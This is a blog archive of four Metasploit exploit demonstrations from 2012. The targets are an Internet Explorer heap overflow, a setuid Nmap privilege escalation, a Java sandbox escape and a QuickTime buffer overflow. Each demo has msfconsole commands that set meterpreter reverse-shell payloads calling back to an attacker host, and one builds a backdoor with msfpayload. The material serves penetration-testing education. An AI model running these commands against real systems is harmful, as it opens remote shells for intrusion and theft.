Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

MS12-037 Internet Explorer CVE-2012-1876 Vulnerability Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability discovered by VUPEN Security and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2012-03-14
Public release of the vulnerability the 2012-06-12
Details of the vulnerability provided by VUPEN the 2012-07-10
Metasploit PoC provided the 2012-07-31

PoC provided by :

Alexandre Pelletier
mr_me
binjo
sinn3r
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1876
OSVDB-82866
ZDI-12-093

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a heap overflow vulnerability in Internet Explorer caused by an incorrect handling of the span attribute for col elements from a fixed table, when they are modified dynamically by javascript code.

Commands :

use exploit/windows/browser/ms12_037_ie_colspan
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Setuid Nmap Exploit Metasploit Demo

Exploits, Metasploit, Nmap

Timeline :

Metasploit PoC provided the 2012-06-13

PoC provided by :

egypt

Reference(s) :

None

Affected version(s) :

All Nmap versions with setuid

Tested on CentOS release 6.2 with :

Nmap 6.01

Description :

Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons..” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.

Commands :

You will require to have an active session on the target, this session could be done  through a backdoor.

sudo msfpayload linux/x86/meterpreter/reverse_tcp  LHOST=192.168.178.100 X > backdoor

Upload the backdoor on the target

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-1723 Oracle Java Applet Field Bytecode Verifier Cache RCE Metasploit Demo

Exploits, Metasploit,

Timeline :

Public release of the vulnerability the 2012-06-12
First PoC provided by Michael Schierl the 2012-06-13
Metasploit PoC provided the 2012-07-09

PoC provided by :

Stefan Cornellius
mihi
littlelightlittlefire
juan vazquez
sinn3r

Reference(s) :

CVE-2012-1723
OSVDB-82877
BID-52161
Oracle Java SE Critical Patch Update Advisory – June 2012

Affected version(s) :

Oracle Java JSE 7 Update 4 and before
Oracle Java JSE 6 Update 32 and before
Oracle Java JSE 5 Update 35 and before
Oracle Java JSE 1.4.2_37 and before

Tested on Windows XP Pro SP3 with :

Oracle JSE 1.6.0_32-b05

Description :

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Commands :

use exploit/multi/browser/java_verifier_field_access
set SRVHOST 192.168.178.100
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0663 Apple QuickTime TeXML BoF Vulnerability Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered by Alexander Gavrun
Vulnerability reported to ZDI by Alexander Gavrun
Vulnerability reported by ZDI to the vendor the 2011-10-21
Coordinate public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-27

PoC provided by :

Alexander Gavrun
sinn3r
juan vazquez

Reference(s) :

CVE-2012-0663
OSVDB-81934
BID-53571
ZDI-12-107
HT1222

Affected version(s) :

QuickTime version 7.7.1 and previous

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, storing user-supplied data on the stack, which results the overflow.

Commands :

use exploit/windows/fileformat/apple_quicktime_texml
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid